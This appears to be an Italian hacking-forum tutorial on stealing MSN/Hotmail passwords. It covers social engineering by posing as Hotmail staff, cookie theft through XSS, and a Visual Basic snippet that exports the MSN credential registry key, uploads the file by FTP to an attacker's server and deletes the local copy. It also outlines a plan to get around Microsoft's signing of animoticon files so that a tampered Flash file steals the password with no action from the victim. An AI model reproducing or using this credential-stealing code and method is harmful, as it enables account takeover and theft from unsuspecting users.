Menu principale:
Hå¢kÎñG M§Ñ
Ti serve una password?
Quella di MSN o altro?
Non c'e problema!
Iniziamo dal principio.
A noi occorre una password, prima cosa a cui pensiamo:
Dove la possiamo trovare?
La password si trova nella testa della vittima, nel suo pc ( cookie o chive di regedit) e nei server ( in questo caso hotmail).
Abbiamo dunque tre possibilita per farci dare la chiave di accesso.
Possiamo provare a prelevarla direttamente dalla vittima, con la famosa e tanto usata tecnica dell'ingegneria sociale, che come saprete consiste nel fingersi qualcun altro ( come lo staff hotmail ) per farcela consegnare direttamente dalla vittima.
Seconda ipotesi.
Entriamo nei server Hotmail e la prendiamo...
Ma non ci conviene giusto?
Terza ed ultima ioptesi
La chiave si trova nel pc della vittima.
Possiamo trovarla sotto forma di Cookie ( non parliamo di una vera e propria password ma di frammenti di informazioni che ci identificano).
In questo caso bastera sfruttare uno dei tanti bachi di xss ( cross site scripting ) per sottrarre le info desiderate, ed accededere mediante cookie, ossia senza digitare la password.
Ancora possiamo trovare la vera e propria password nel pc della vittimae in particolare MSN la conserva nel "registro di configurazione del sistema" ( regedit ) per evitare di farcela digitare ogni volta.
Ora con un semplice programma scritto in vb da KinG-LioN in colaborazione con Kingolo, abbiamo la possibilita di prelevare quale chiave di registro vogliamo... bastera dunque digitare il percorso dove msn salva la password ed il gioco e fatto.
[code]
Shell ("command.com /c reg export HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL c:\pwd.txt")
Dim passw As String
Dim ftpurl As String
kinglion = "tuoftp"
eurohackers = "tuapassw"
ftpurl = "ftp://tuoftp.eurohackers.it"
inet.URL = ftpurl
inet.UserName = kinglion
inet.Password = eurohackers
passw = "pwd.txt"
inet.Execute inet.URL, "PUT C:\pwd.txt " & passw
Do While inet.StillExecuting = True
DoEvents
Loop
Kill "C:\pwd.txt"
End Sub [/code]
Ma non è tutto, oggi vi detto le basi per un attacco davvero potente col quale poter mettere in ginocchio MSN.
Questo attacco e stato elaborato interamente da me, ed a quanto mi risulta fino ad oggi nessuno ci aveva mai pensato, o ci era mai riuscito, spero comunque che non lo usiate per delle lamerate, anzi, ne sono piu che sicuro che con tale attacco difficilmente farete danni, perche solo in pochi riuscirete a sfruttarlo.
A maggior precauzione dell'indennità dei clienti Hotmail vi spiegoro "solo" cosa fare, ma non "come fare".
Come ho scritto sopra, con un programma che io ho scritto in vb, ma che puo essere riscritto in vari linguaggi possiamo impossessarci della chaive di registro della vittima, in questo caso parliamo di una chiave MSN.
Il problema che ci poniamo a questo punto è: Come faccio eseguire il programma alla vittima?
Mica vado da lui e gli dico: Tie apri questo eseguibile.
Qua ci viene in aiuto lo stesso hotmail.
Il caro e tanto usato programma ci permette di inviare sul pc vittima una serie di animatizioni in FLASH chiamate "animoticon" , senza contare la condivisione degli sfondi in flash e degli avatar animati, dunque ci permette di eseguire codice direttamente sul pc vittima.
Codice tra l'altro innocuo anche perche tutti gli sfondi, avatar ed animoticon devono essere approvati dalla mamma m*i*c*r*o*$*o*f*t con una personale chiave dal valore di 400 euro.
Ora proviamo ad aprire i file .mco ( avatar animoticon ) e troveremo un file .cab ed un file xml criptato per la maggior parte in base 64.
Apriamo anche il file cab e troviamo a sua volta il file swf ed un file xml che contiene la chiave m*i*c*r*o*$*o*f*t criptata in base64.
Sta a voi il resto, scopritee come baipassare la chiave m*i*c*r*o*$*o*f*t e sostituite il file swf originale con uno modificato da voi contenente il codice adattato per prelevare la chiave dal registro vittima.
Se avrete fatto tutto bene, riuscirete ad installare l'animoticon, e vi bastera inviarlo alla vittima come un normale smile per ricevere la sua password, non occorrera dunque che la vittima apra qualcosa, o faccia qualcosa, basta solo che lo abbiate nei contatti, e che abbia la password salvata.
Attenzione alla versione di msn che usa la vittima, il percorso della chiave di registro cambia.
Ultima cosa, non fate affidamento sul programma in vb che ho scritto, perche non e compatibile con flash, in quanto vb e un linguaggio da compilare.
Tecnica provata con msn 7.5 , 8.0 e successivi
Buona Fortuna, spero di esservi stato utile